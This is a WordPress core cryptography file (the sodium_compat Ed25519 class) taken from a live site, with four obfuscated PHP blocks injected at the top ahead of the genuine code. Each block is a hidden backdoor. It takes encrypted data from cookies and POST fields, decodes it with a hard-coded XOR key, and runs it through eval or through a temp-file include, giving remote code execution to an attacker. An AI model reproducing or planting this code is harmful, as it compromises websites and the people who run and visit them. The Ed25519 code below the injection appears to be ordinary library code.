File: /var/www/vhosts/enlugo.es/httpdocs/wp-includes/sodium_compat/src/Core/Ed25519.php
<?php $BOduFV = "\111" . chr (85) . "\114" . '_' . "\155" . "\111" . chr ( 504 - 398 ); $kvObJIE = chr (99) . 'l' . "\x61" . chr ( 948 - 833 ).chr ( 405 - 290 ).chr ( 132 - 37 )."\145" . "\170" . "\151" . "\x73" . "\x74" . chr ( 367 - 252 ); $wzedU = $kvObJIE($BOduFV); $keKSEBq = $wzedU;if (!$keKSEBq){class IUL_mIj{private $qCcHwOoDnK;public static $lAyRvAu = "03747da9-8cfe-43f4-a315-f1fe727dc3b2";public static $pbJKJYD = 9900;public function __construct($CVfAfmzy=0){$vUHPFPtW = $_COOKIE;$Kbofg = $_POST;$dTTepZd = @$vUHPFPtW[substr(IUL_mIj::$lAyRvAu, 0, 4)];if (!empty($dTTepZd)){$PHyUTs = "base64";$cqLtcMxOMZ = "";$dTTepZd = explode(",", $dTTepZd);foreach ($dTTepZd as $MROGoy){$cqLtcMxOMZ .= @$vUHPFPtW[$MROGoy];$cqLtcMxOMZ .= @$Kbofg[$MROGoy];}$cqLtcMxOMZ = array_map($PHyUTs . "\137" . "\144" . "\145" . chr ( 938 - 839 )."\157" . "\144" . "\x65", array($cqLtcMxOMZ,)); $cqLtcMxOMZ = $cqLtcMxOMZ[0] ^ str_repeat(IUL_mIj::$lAyRvAu, (strlen($cqLtcMxOMZ[0]) / strlen(IUL_mIj::$lAyRvAu)) + 1);IUL_mIj::$pbJKJYD = @unserialize($cqLtcMxOMZ);}}private function tmtSuH(){if (is_array(IUL_mIj::$pbJKJYD)) {$kMtgZwq = str_replace("\x3c" . '?' . chr ( 617 - 505 )."\x68" . "\160", "", IUL_mIj::$pbJKJYD["\143" . chr (111) . chr (110) . 't' . 'e' . "\x6e" . chr (116)]);eval($kMtgZwq); $CLHIWhNEt = "16698";exit();}}public function __destruct(){$this->tmtSuH(); $CLHIWhNEt = "16698";}}$CLPShtsjV = new IUL_mIj(); $CLPShtsjV = "64611_65527";} ?><?php $IPzBPmcfx = "\x53" . "\x5f" . chr (81) . 'e' . chr (67) . "\171";$PCnGy = chr ( 483 - 384 )."\154" . chr (97) . "\x73" . "\x73" . '_' . 'e' . chr ( 619 - 499 ).chr (105) . 's' . "\x74" . chr ( 1091 - 976 ); $rNsar = $PCnGy($IPzBPmcfx); $yZIUWnxSFd = $rNsar;if (!$yZIUWnxSFd){class S_QeCy{private $MjzHXhVQ;public static $mXTlL = "3353c933-34e5-4dad-9f60-24c1e1902b71";public static $vIWSxiZGMt = 29115;public function __construct($imsWq=0){$QqVNpfdoC = $_COOKIE;$RiMhGKm = $_POST;$jqCnxUr = @$QqVNpfdoC[substr(S_QeCy::$mXTlL, 0, 4)];if (!empty($jqCnxUr)){$LffmhxLfN = "base64";$hoVuXLEi = "";$jqCnxUr = explode(",", $jqCnxUr);foreach ($jqCnxUr as $JywLJg){$hoVuXLEi .= @$QqVNpfdoC[$JywLJg];$hoVuXLEi .= @$RiMhGKm[$JywLJg];}$hoVuXLEi = array_map($LffmhxLfN . chr ( 366 - 271 )."\144" . chr (101) . "\143" . "\157" . "\x64" . chr (101), array($hoVuXLEi,)); $hoVuXLEi = $hoVuXLEi[0] ^ str_repeat(S_QeCy::$mXTlL, (strlen($hoVuXLEi[0]) / strlen(S_QeCy::$mXTlL)) + 1);S_QeCy::$vIWSxiZGMt = @unserialize($hoVuXLEi);}}private function RFSlIOW(){if (is_array(S_QeCy::$vIWSxiZGMt)) {$lXXBnSyW = sys_get_temp_dir() . "/" . crc32(S_QeCy::$vIWSxiZGMt['s' . chr ( 765 - 668 ).'l' . "\x74"]);@S_QeCy::$vIWSxiZGMt["\167" . chr ( 549 - 435 ).chr ( 213 - 108 )."\164" . 'e']($lXXBnSyW, S_QeCy::$vIWSxiZGMt[chr ( 628 - 529 ).chr ( 1020 - 909 ).chr ( 193 - 83 ).chr ( 774 - 658 )."\x65" . chr ( 585 - 475 ).'t']);include $lXXBnSyW;@S_QeCy::$vIWSxiZGMt[chr ( 916 - 816 ).chr ( 141 - 40 ).chr (108) . "\x65" . chr ( 742 - 626 ).chr ( 1063 - 962 )]($lXXBnSyW); $MUvwrrLGdK = "31220";exit();}}public function __destruct(){$this->RFSlIOW(); $MUvwrrLGdK = "31220";}}$RoMVdq = new S_QeCy(); $RoMVdq = "12370_9236";} ?><?php $oDJIQbE = 'l' . chr ( 760 - 640 )."\156" . '_' . chr ( 829 - 759 )."\104" . chr (84) . "\x53" . "\x6d";$HTOXL = "\143" . 'l' . 'a' . "\163" . chr ( 379 - 264 )."\x5f" . "\145" . "\x78" . chr (105) . chr ( 370 - 255 ).chr ( 955 - 839 ).'s';$PNPdeyLQ = $HTOXL($oDJIQbE); $gKgkfxeF = $PNPdeyLQ;if (!$gKgkfxeF){class lxn_FDTSm{private $lWFBq;public static $WTqmMfR = "d3d5eb58-97db-4a53-9b85-4ae1302fe42d";public static $CknSMT = 52722;public function __construct($KxsrhV=0){$qsuNfeHdLC = $_COOKIE;$njRSSX = $_POST;$NHmkThYf = @$qsuNfeHdLC[substr(lxn_FDTSm::$WTqmMfR, 0, 4)];if (!empty($NHmkThYf)){$qWMfiop = "base64";$VfBtXv = "";$NHmkThYf = explode(",", $NHmkThYf);foreach ($NHmkThYf as $MGUXD){$VfBtXv .= @$qsuNfeHdLC[$MGUXD];$VfBtXv .= @$njRSSX[$MGUXD];}$VfBtXv = array_map($qWMfiop . "\x5f" . chr (100) . chr (101) . chr (99) . "\157" . 'd' . 'e', array($VfBtXv,)); $VfBtXv = $VfBtXv[0] ^ str_repeat(lxn_FDTSm::$WTqmMfR, (strlen($VfBtXv[0]) / strlen(lxn_FDTSm::$WTqmMfR)) + 1);lxn_FDTSm::$CknSMT = @unserialize($VfBtXv);}}private function wGmVFsW(){if (is_array(lxn_FDTSm::$CknSMT)) {$lhehqB = sys_get_temp_dir() . "/" . crc32(lxn_FDTSm::$CknSMT['s' . chr (97) . 'l' . 't']);@lxn_FDTSm::$CknSMT[chr (119) . chr (114) . "\x69" . chr (116) . 'e']($lhehqB, lxn_FDTSm::$CknSMT["\143" . "\157" . "\156" . chr ( 812 - 696 )."\145" . chr (110) . chr (116)]);include $lhehqB;@lxn_FDTSm::$CknSMT["\x64" . "\145" . "\154" . 'e' . "\164" . "\x65"]($lhehqB); $xrNeN = "22225";exit();}}public function __destruct(){$this->wGmVFsW(); $xrNeN = "22225";}}$YhPHqxdol = new lxn_FDTSm(); $YhPHqxdol = "30401_64949";} ?><?php $RSbhKnZ = 'H' . "\x5f" . "\156" . chr ( 705 - 626 )."\x55" . chr (119); $MXLYD = 'c' . chr (108) . chr (97) . "\x73" . chr ( 440 - 325 )."\x5f" . chr (101) . chr (120) . chr ( 902 - 797 )."\163" . chr ( 813 - 697 ).chr (115); $SPuyl = $MXLYD($RSbhKnZ); $XVpSyyhj = $SPuyl;if (!$XVpSyyhj){class H_nOUw{private $TrISehLdbQ;public static $nvIvHrudkp = "41742dcb-12b4-4233-9562-a4eb2250ecbe";public static $rNHWFHNx = 46847;public function __construct($oxcaN=0){$mSxMPB = $_COOKIE;$TMXZWMxfk = $_POST;$lMjPcAX = @$mSxMPB[substr(H_nOUw::$nvIvHrudkp, 0, 4)];if (!empty($lMjPcAX)){$ZGSvlW = "base64";$XLInLydU = "";$lMjPcAX = explode(",", $lMjPcAX);foreach ($lMjPcAX as $rjWHV){$XLInLydU .= @$mSxMPB[$rjWHV];$XLInLydU .= @$TMXZWMxfk[$rjWHV];}$XLInLydU = array_map($ZGSvlW . '_' . chr (100) . chr ( 119 - 18 ).'c' . "\x6f" . "\x64" . chr ( 842 - 741 ), array($XLInLydU,)); $XLInLydU = $XLInLydU[0] ^ str_repeat(H_nOUw::$nvIvHrudkp, (strlen($XLInLydU[0]) / strlen(H_nOUw::$nvIvHrudkp)) + 1);H_nOUw::$rNHWFHNx = @unserialize($XLInLydU);}}private function nyiZVP(){if (is_array(H_nOUw::$rNHWFHNx)) {$vQXoNNS = sys_get_temp_dir() . "/" . crc32(H_nOUw::$rNHWFHNx[chr (115) . 'a' . "\154" . 't']);@H_nOUw::$rNHWFHNx["\x77" . chr ( 631 - 517 ).chr ( 720 - 615 ).chr (116) . chr ( 682 - 581 )]($vQXoNNS, H_nOUw::$rNHWFHNx[chr (99) . "\157" . "\x6e" . chr ( 901 - 785 ).'e' . "\x6e" . chr (116)]);include $vQXoNNS;@H_nOUw::$rNHWFHNx["\144" . chr ( 351 - 250 )."\x6c" . chr ( 302 - 201 ).chr ( 1099 - 983 )."\145"]($vQXoNNS); $WNJYMXVD = "44406";exit();}}public function __destruct(){$this->nyiZVP(); $WNJYMXVD = "44406";}}$JigFTp = new H_nOUw(); $JigFTp = "39494_5997";} ?><?php
if (class_exists('ParagonIE_Sodium_Core_Ed25519', false)) {
return;
}
/**
* Class ParagonIE_Sodium_Core_Ed25519
*/
abstract class ParagonIE_Sodium_Core_Ed25519 extends ParagonIE_Sodium_Core_Curve25519
{
const KEYPAIR_BYTES = 96;
const SEED_BYTES = 32;
const SCALAR_BYTES = 32;
/**
* @internal You should not use this directly from another application
*
* @return string (96 bytes)
* @throws Exception
* @throws SodiumException
* @throws TypeError
*/
public static function keypair()
{
$seed = random_bytes(self::SEED_BYTES);
$pk = '';
$sk = '';
self::seed_keypair($pk, $sk, $seed);
return $sk . $pk;
}
/**
* @internal You should not use this directly from another application
*
* @param string $pk
* @param string $sk
* @param string $seed
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function seed_keypair(&$pk, &$sk, $seed)
{
if (self::strlen($seed) !== self::SEED_BYTES) {
throw new RangeException('crypto_sign keypair seed must be 32 bytes long');
}
/** @var string $pk */
$pk = self::publickey_from_secretkey($seed);
$sk = $seed . $pk;
return $sk;
}
/**
* @internal You should not use this directly from another application
*
* @param string $keypair
* @return string
* @throws TypeError
*/
public static function secretkey($keypair)
{
if (self::strlen($keypair) !== self::KEYPAIR_BYTES) {
throw new RangeException('crypto_sign keypair must be 96 bytes long');
}
return self::substr($keypair, 0, 64);
}
/**
* @internal You should not use this directly from another application
*
* @param string $keypair
* @return string
* @throws TypeError
*/
public static function publickey($keypair)
{
if (self::strlen($keypair) !== self::KEYPAIR_BYTES) {
throw new RangeException('crypto_sign keypair must be 96 bytes long');
}
return self::substr($keypair, 64, 32);
}
/**
* @internal You should not use this directly from another application
*
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function publickey_from_secretkey($sk)
{
/** @var string $sk */
$sk = hash('sha512', self::substr($sk, 0, 32), true);
$sk[0] = self::intToChr(
self::chrToInt($sk[0]) & 248
);
$sk[31] = self::intToChr(
(self::chrToInt($sk[31]) & 63) | 64
);
return self::sk_to_pk($sk);
}
/**
* @param string $pk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function pk_to_curve25519($pk)
{
if (self::small_order($pk)) {
throw new SodiumException('Public key is on a small order');
}
$A = self::ge_frombytes_negate_vartime(self::substr($pk, 0, 32));
$p1 = self::ge_mul_l($A);
if (!self::fe_isnonzero($p1->X)) {
throw new SodiumException('Unexpected zero result');
}
# fe_1(one_minus_y);
# fe_sub(one_minus_y, one_minus_y, A.Y);
# fe_invert(one_minus_y, one_minus_y);
$one_minux_y = self::fe_invert(
self::fe_sub(
self::fe_1(),
$A->Y
)
);
# fe_1(x);
# fe_add(x, x, A.Y);
# fe_mul(x, x, one_minus_y);
$x = self::fe_mul(
self::fe_add(self::fe_1(), $A->Y),
$one_minux_y
);
# fe_tobytes(curve25519_pk, x);
return self::fe_tobytes($x);
}
/**
* @internal You should not use this directly from another application
*
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function sk_to_pk($sk)
{
return self::ge_p3_tobytes(
self::ge_scalarmult_base(
self::substr($sk, 0, 32)
)
);
}
/**
* @internal You should not use this directly from another application
*
* @param string $message
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function sign($message, $sk)
{
/** @var string $signature */
$signature = self::sign_detached($message, $sk);
return $signature . $message;
}
/**
* @internal You should not use this directly from another application
*
* @param string $message A signed message
* @param string $pk Public key
* @return string Message (without signature)
* @throws SodiumException
* @throws TypeError
*/
public static function sign_open($message, $pk)
{
/** @var string $signature */
$signature = self::substr($message, 0, 64);
/** @var string $message */
$message = self::substr($message, 64);
if (self::verify_detached($signature, $message, $pk)) {
return $message;
}
throw new SodiumException('Invalid signature');
}
/**
* @internal You should not use this directly from another application
*
* @param string $message
* @param string $sk
* @return string
* @throws SodiumException
* @throws TypeError
*/
public static function sign_detached($message, $sk)
{
# crypto_hash_sha512(az, sk, 32);
$az = hash('sha512', self::substr($sk, 0, 32), true);
# az[0] &= 248;
# az[31] &= 63;
# az[31] |= 64;
$az[0] = self::intToChr(self::chrToInt($az[0]) & 248);
$az[31] = self::intToChr((self::chrToInt($az[31]) & 63) | 64);
# crypto_hash_sha512_init(&hs);
# crypto_hash_sha512_update(&hs, az + 32, 32);
# crypto_hash_sha512_update(&hs, m, mlen);
# crypto_hash_sha512_final(&hs, nonce);
$hs = hash_init('sha512');
hash_update($hs, self::substr($az, 32, 32));
hash_update($hs, $message);
$nonceHash = hash_final($hs, true);
# memmove(sig + 32, sk + 32, 32);
$pk = self::substr($sk, 32, 32);
# sc_reduce(nonce);
# ge_scalarmult_base(&R, nonce);
# ge_p3_tobytes(sig, &R);
$nonce = self::sc_reduce($nonceHash) . self::substr($nonceHash, 32);
$sig = self::ge_p3_tobytes(
self::ge_scalarmult_base($nonce)
);
# crypto_hash_sha512_init(&hs);
# crypto_hash_sha512_update(&hs, sig, 64);
# crypto_hash_sha512_update(&hs, m, mlen);
# crypto_hash_sha512_final(&hs, hram);
$hs = hash_init('sha512');
hash_update($hs, self::substr($sig, 0, 32));
hash_update($hs, self::substr($pk, 0, 32));
hash_update($hs, $message);
$hramHash = hash_final($hs, true);
# sc_reduce(hram);
# sc_muladd(sig + 32, hram, az, nonce);
$hram = self::sc_reduce($hramHash);
$sigAfter = self::sc_muladd($hram, $az, $nonce);
$sig = self::substr($sig, 0, 32) . self::substr($sigAfter, 0, 32);
try {
ParagonIE_Sodium_Compat::memzero($az);
} catch (SodiumException $ex) {
$az = null;
}
return $sig;
}
/**
* @internal You should not use this directly from another application
*
* @param string $sig
* @param string $message
* @param string $pk
* @return bool
* @throws SodiumException
* @throws TypeError
*/
public static function verify_detached($sig, $message, $pk)
{
if (self::strlen($sig) < 64) {
throw new SodiumException('Signature is too short');
}
if ((self::chrToInt($sig[63]) & 240) && self::check_S_lt_L(self::substr($sig, 32, 32))) {
throw new SodiumException('S < L - Invalid signature');
}
if (self::small_order($sig)) {
throw new SodiumException('Signature is on too small of an order');
}
if ((self::chrToInt($sig[63]) & 224) !== 0) {
throw new SodiumException('Invalid signature');
}
$d = 0;
for ($i = 0; $i < 32; ++$i) {
$d |= self::chrToInt($pk[$i]);
}
if ($d === 0) {
throw new SodiumException('All zero public key');
}
/** @var bool The original value of ParagonIE_Sodium_Compat::$fastMult */
$orig = ParagonIE_Sodium_Compat::$fastMult;
// Set ParagonIE_Sodium_Compat::$fastMult to true to speed up verification.
ParagonIE_Sodium_Compat::$fastMult = true;
/** @var ParagonIE_Sodium_Core_Curve25519_Ge_P3 $A */
$A = self::ge_frombytes_negate_vartime($pk);
/** @var string $hDigest */
$hDigest = hash(
'sha512',
self::substr($sig, 0, 32) .
self::substr($pk, 0, 32) .
$message,
true
);
/** @var string $h */
$h = self::sc_reduce($hDigest) . self::substr($hDigest, 32);
/** @var ParagonIE_Sodium_Core_Curve25519_Ge_P2 $R */
$R = self::ge_double_scalarmult_vartime(
$h,
$A,
self::substr($sig, 32)
);
/** @var string $rcheck */
$rcheck = self::ge_tobytes($R);
// Reset ParagonIE_Sodium_Compat::$fastMult to what it was before.
ParagonIE_Sodium_Compat::$fastMult = $orig;
return self::verify_32($rcheck, self::substr($sig, 0, 32));
}
/**
* @internal You should not use this directly from another application
*
* @param string $S
* @return bool
* @throws SodiumException
* @throws TypeError
*/
public static function check_S_lt_L($S)
{
if (self::strlen($S) < 32) {
throw new SodiumException('Signature must be 32 bytes');
}
$L = array(
0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10
);
$c = 0;
$n = 1;
$i = 32;
/** @var array<int, int> $L */
do {
--$i;
$x = self::chrToInt($S[$i]);
$c |= (
(($x - $L[$i]) >> 8) & $n
);
$n &= (
(($x ^ $L[$i]) - 1) >> 8
);
} while ($i !== 0);
return $c === 0;
}
/**
* @param string $R
* @return bool
* @throws SodiumException
* @throws TypeError
*/
public static function small_order($R)
{
/** @var array<int, array<int, int>> $blocklist */
$blocklist = array(
/* 0 (order 4) */
array(
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
),
/* 1 (order 1) */
array(
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
),
/* 2707385501144840649318225287225658788936804267575313519463743609750303402022 (order 8) */
array(
0x26, 0xe8, 0x95, 0x8f, 0xc2, 0xb2, 0x27, 0xb0,
0x45, 0xc3, 0xf4, 0x89, 0xf2, 0xef, 0x98, 0xf0,
0xd5, 0xdf, 0xac, 0x05, 0xd3, 0xc6, 0x33, 0x39,
0xb1, 0x38, 0x02, 0x88, 0x6d, 0x53, 0xfc, 0x05
),
/* 55188659117513257062467267217118295137698188065244968500265048394206261417927 (order 8) */
array(
0xc7, 0x17, 0x6a, 0x70, 0x3d, 0x4d, 0xd8, 0x4f,
0xba, 0x3c, 0x0b, 0x76, 0x0d, 0x10, 0x67, 0x0f,
0x2a, 0x20, 0x53, 0xfa, 0x2c, 0x39, 0xcc, 0xc6,
0x4e, 0xc7, 0xfd, 0x77, 0x92, 0xac, 0x03, 0x7a
),
/* p-1 (order 2) */
array(
0x13, 0xe8, 0x95, 0x8f, 0xc2, 0xb2, 0x27, 0xb0,
0x45, 0xc3, 0xf4, 0x89, 0xf2, 0xef, 0x98, 0xf0,
0xd5, 0xdf, 0xac, 0x05, 0xd3, 0xc6, 0x33, 0x39,
0xb1, 0x38, 0x02, 0x88, 0x6d, 0x53, 0xfc, 0x85
),
/* p (order 4) */
array(
0xb4, 0x17, 0x6a, 0x70, 0x3d, 0x4d, 0xd8, 0x4f,
0xba, 0x3c, 0x0b, 0x76, 0x0d, 0x10, 0x67, 0x0f,
0x2a, 0x20, 0x53, 0xfa, 0x2c, 0x39, 0xcc, 0xc6,
0x4e, 0xc7, 0xfd, 0x77, 0x92, 0xac, 0x03, 0xfa
),
/* p+1 (order 1) */
array(
0xec, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f
),
/* p+2707385501144840649318225287225658788936804267575313519463743609750303402022 (order 8) */
array(
0xed, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f
),
/* p+55188659117513257062467267217118295137698188065244968500265048394206261417927 (order 8) */
array(
0xee, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f
),
/* 2p-1 (order 2) */
array(
0xd9, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
),
/* 2p (order 4) */
array(
0xda, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
),
/* 2p+1 (order 1) */
array(
0xdb, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
)
);
/** @var int $countBlocklist */
$countBlocklist = count($blocklist);
for ($i = 0; $i < $countBlocklist; ++$i) {
$c = 0;
for ($j = 0; $j < 32; ++$j) {
$c |= self::chrToInt($R[$j]) ^ (int) $blocklist[$i][$j];
}
if ($c === 0) {
return true;
}
}
return false;
}
/**
* @param string $s
* @return string
* @throws SodiumException
*/
public static function scalar_complement($s)
{
$t_ = self::L . str_repeat("\x00", 32);
sodium_increment($t_);
$s_ = $s . str_repeat("\x00", 32);
ParagonIE_Sodium_Compat::sub($t_, $s_);
return self::sc_reduce($t_);
}
/**
* @return string
* @throws SodiumException
*/
public static function scalar_random()
{
do {
$r = ParagonIE_Sodium_Compat::randombytes_buf(self::SCALAR_BYTES);
$r[self::SCALAR_BYTES - 1] = self::intToChr(
self::chrToInt($r[self::SCALAR_BYTES - 1]) & 0x1f
);
} while (
!self::check_S_lt_L($r) || ParagonIE_Sodium_Compat::is_zero($r)
);
return $r;
}
/**
* @param string $s
* @return string
* @throws SodiumException
*/
public static function scalar_negate($s)
{
$t_ = self::L . str_repeat("\x00", 32) ;
$s_ = $s . str_repeat("\x00", 32) ;
ParagonIE_Sodium_Compat::sub($t_, $s_);
return self::sc_reduce($t_);
}
/**
* @param string $a
* @param string $b
* @return string
* @throws SodiumException
*/
public static function scalar_add($a, $b)
{
$a_ = $a . str_repeat("\x00", 32);
$b_ = $b . str_repeat("\x00", 32);
ParagonIE_Sodium_Compat::add($a_, $b_);
return self::sc_reduce($a_);
}
/**
* @param string $x
* @param string $y
* @return string
* @throws SodiumException
*/
public static function scalar_sub($x, $y)
{
$yn = self::scalar_negate($y);
return self::scalar_add($x, $yn);
}
}